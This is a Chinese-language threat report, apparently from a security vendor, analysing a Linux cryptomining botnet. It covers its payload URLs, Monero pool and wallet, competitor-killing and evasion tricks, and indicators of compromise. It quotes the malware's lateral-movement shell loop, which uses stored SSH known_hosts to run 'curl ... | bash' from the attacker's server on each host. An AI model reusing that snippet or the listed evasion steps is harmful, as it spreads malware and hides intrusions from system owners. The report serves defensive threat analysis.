威胁快讯:一次僵尸挖矿威胁分析

友商发布了一个威胁分析 报告,我们阐述一下从我们的角度看到的情况。

核心样本

hxxp://120.55.54.65/a7  

核心样本是个 Linux Shell 文件,后续动作均由该样本完成,包括:

  • 挖矿获利
  • 确保资源
  • 逃避检测
  • 横向扩展

挖矿获利

具体的挖矿动作是由下面一组样本完成的:

  • hxxps://www.aybc.so/ubuntu.tar.gz
  • hxxps://www.aybc.so/debian.tar.gz
  • hxxps://www.aybc.so/cent.tar.gz

样本中的挖矿配置如下:

  • 矿池地址:xmr-asia1.nanopool.org:14433
  • 钱包地址:42im1KxfTw2Sxa716eKkQAcJpS6cwqkGaHHGnnUAcdDhG2NJhqEF1nNRwjkBsYDJQtDkLCTPehfDC4zjMy5hefT81Xk2h7V.v7

查矿池给付记录可知:

  • 累计收益:52.403617565491 XMR
  • 当前算力:114,030.0 H/s
  • 开始时间:2018-02-28 14:30:03
  • 最近给付时间:2018-06-26 05:35:36

确保资源

核心模块中为了确保挖矿资源,采取了若干对抗动作,包括:

  • 杀进程:杀掉了其他挖矿进程运行,进程关键字包括 xig, cranbery, xmr,stratum,minerd
  • 设防火墙规则:为防止竞争者DDG僵尸网络的矿机下载,屏蔽IP地址 165.225.157.157
  • 调整hosts:屏蔽了若干矿池,包括 yiluzhuanqian, f2pool, minexmr 等等

逃避检测

核心模块采取了若干动作对抗检测,包括:

  • 调整文件时间,逃避 find 检索。使用 /etc/sudoers 文件的时间来对齐自身关键文件时间
  • 隐藏进程:调用 libprocesshider ,来自github 上 gianlucaborello 的 libprocesshider项目
  • 调整 ld.so.preload:按照友商的说法是隐藏进程
  • 调整dns服务器:防止被从dns流量中分析出来,将本地DNS服务器设为 8.8.8.8 和 1.1.1.1
  • 对抗阿里云、云镜:调用 aliyun、yunjing的uninstall脚本
  • 删除日志和邮件:删除文件包括 /var/log/cron /var/spool/mail/root /var/mail/root

横向扩展

检查本地 ssh 凭证,尝试进一步横向扩展,继续投递核心模块 a7

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then  
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  hxxp://120.55.54.65/a7 | bash >/dev/null 2>&1 &' & done
fi  

IoC

主要模块

hxxp://120.55.54.65/a7     AS37963 Hangzhou Alibaba Advertising Co.,Ltd.  

挖矿程序

hxxps://www.aybc.so/ubuntu.tar.gz  
hxxps://www.aybc.so/debian.tar.gz  
hxxps://www.aybc.so/cent.tar.gz